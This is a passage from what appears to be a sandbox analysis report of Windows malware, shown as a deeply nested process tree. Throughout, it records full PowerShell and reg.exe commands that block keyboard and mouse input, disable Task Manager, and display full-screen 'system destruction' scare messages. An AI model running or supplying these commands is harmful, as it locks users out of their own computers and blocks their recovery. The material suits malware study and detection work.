        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        27⤵
        
        PID:2072
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3katghhf\3katghhf.cmdline"
        28⤵
        
        PID:1496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        27⤵
        
        PID:5164
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aha1uxvh\aha1uxvh.cmdline"
        28⤵
        
        PID:1120
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA14.tmp" "c:\Users\Admin\AppData\Local\Temp\aha1uxvh\CSC4C9438CDEF4144A3888B1DA064C68AF.TMP"
        29⤵
        
        PID:5984
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        27⤵
        
        PID:6116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5256
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tekeubxr\tekeubxr.cmdline"
        28⤵
        
        PID:2040
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDFC.tmp" "c:\Users\Admin\AppData\Local\Temp\tekeubxr\CSCA7410E7BEB5C447287375AEF9F6CD4D.TMP"
        29⤵
        
        PID:5640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        25⤵
        
        PID:4312
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eiebqo2v\eiebqo2v.cmdline"
        26⤵
        
        PID:3376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5536
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ujgpqfa5\ujgpqfa5.cmdline"
        26⤵
        
        PID:6088
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD793.tmp" "c:\Users\Admin\AppData\Local\Temp\ujgpqfa5\CSC542BA65579C744CD85CCEA5A401886DF.TMP"
        27⤵
        
        PID:712
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        25⤵
        
        PID:5240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        25⤵
        
        PID:5296
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4z5ebu0s\4z5ebu0s.cmdline"
        26⤵
        
        PID:756
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC18.tmp" "c:\Users\Admin\AppData\Local\Temp\4z5ebu0s\CSCD04E778EC1E43BAB8A97F94B4102079.TMP"
        27⤵
        
        PID:5936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        25⤵
        
        PID:5732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        23⤵
        
        PID:4932
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kdwb13l0\kdwb13l0.cmdline"
        24⤵
        
        PID:4212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5556
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vs2h3zym\vs2h3zym.cmdline"
        24⤵
        
        PID:5964
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD09E.tmp" "c:\Users\Admin\AppData\Local\Temp\vs2h3zym\CSC3AC09E569C6F402FA369E79AE61C315A.TMP"
        25⤵
        
        PID:2320
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        23⤵
        
        PID:5664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:540
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fmldwgxk\fmldwgxk.cmdline"
        24⤵
        
        PID:5828
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD65B.tmp" "c:\Users\Admin\AppData\Local\Temp\fmldwgxk\CSC7821EDD3B386451F903A85D38374DB8.TMP"
        25⤵
        
        PID:5588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        21⤵
        
        PID:3836
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d0nfxiq0\d0nfxiq0.cmdline"
        22⤵
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        21⤵
        
        PID:6084
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tuajygi2\tuajygi2.cmdline"
        22⤵
        
        PID:2408
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD81.tmp" "c:\Users\Admin\AppData\Local\Temp\tuajygi2\CSCA380B869D11F48D98258673FE827945.TMP"
        23⤵
        
        PID:5620
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        21⤵
        
        PID:6012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6040
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lzfeq2v1\lzfeq2v1.cmdline"
        22⤵
        
        PID:2328
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD263.tmp" "c:\Users\Admin\AppData\Local\Temp\lzfeq2v1\CSCB54CCB31FE94E8FA83399F8483E6AC6.TMP"
        23⤵
        
        PID:988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        21⤵
        
        PID:5264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        19⤵
        
        PID:468
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mvdtlrx0\mvdtlrx0.cmdline"
        20⤵
        
        PID:4648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5536
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cury0tt2\cury0tt2.cmdline"
        20⤵
        
        PID:5916
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB4F.tmp" "c:\Users\Admin\AppData\Local\Temp\cury0tt2\CSC3ECCEEEE67F4FBABBDF977F668028F6.TMP"
        21⤵
        
        PID:5952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        19⤵
        
        PID:5244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        19⤵
        
        PID:5396
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1t3p3x3n\1t3p3x3n.cmdline"
        20⤵
        
        PID:3568
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF85.tmp" "c:\Users\Admin\AppData\Local\Temp\1t3p3x3n\CSCE82A46DD2F8D4F0E8CC72D9152E84642.TMP"
        21⤵
        
        PID:5760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        17⤵
        
        PID:456
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gdy5ibts\gdy5ibts.cmdline"
        18⤵
        
        PID:2128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4012
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\04xjovq3\04xjovq3.cmdline"
        18⤵
        
        PID:5312
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC94B.tmp" "c:\Users\Admin\AppData\Local\Temp\04xjovq3\CSCC09B05303E074057B64287783FFD8897.TMP"
        19⤵
        
        PID:5372
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        17⤵
        
        PID:5612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        17⤵
        
        PID:5676
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvayj4i1\uvayj4i1.cmdline"
        18⤵
        
        PID:6092
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC39.tmp" "c:\Users\Admin\AppData\Local\Temp\uvayj4i1\CSC6AD2BC286F34957BA8EFEA5D177A8E.TMP"
        19⤵
        
        PID:5152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        17⤵
        
        PID:5604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        15⤵
        
        PID:3596
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vhs4kiuz\vhs4kiuz.cmdline"
        16⤵
        
        PID:1628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1036
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4trcy4qt\4trcy4qt.cmdline"
        16⤵
        
        PID:2412
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6BD.tmp" "c:\Users\Admin\AppData\Local\Temp\4trcy4qt\CSC2D1DF8A728264E4D84C834C9EAB51522.TMP"
        17⤵
        
        PID:1000
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        15⤵
        
        PID:4132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        15⤵
        
        PID:1064
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uj3nrdbo\uj3nrdbo.cmdline"
        16⤵
        
        PID:1308
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB9F.tmp" "c:\Users\Admin\AppData\Local\Temp\uj3nrdbo\CSC3F5C3D80C6924F34984D90258511CB5A.TMP"
        17⤵
        
        PID:3844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:856
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p40tayfu\p40tayfu.cmdline"
        14⤵
        
        PID:724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2732
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u0h4igw2\u0h4igw2.cmdline"
        14⤵
        
        PID:4220
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB798.tmp" "c:\Users\Admin\AppData\Local\Temp\u0h4igw2\CSC29EA3EF41EC141BB96E5C0EF27A89.TMP"
        15⤵
        
        PID:836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        13⤵
        
        PID:3824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2740
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u1wu1lxm\u1wu1lxm.cmdline"
        14⤵
        
        PID:8
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBAF.tmp" "c:\Users\Admin\AppData\Local\Temp\u1wu1lxm\CSC738387E43CBD49E180721C83B53EE8E5.TMP"
        15⤵
        
        PID:4328
        
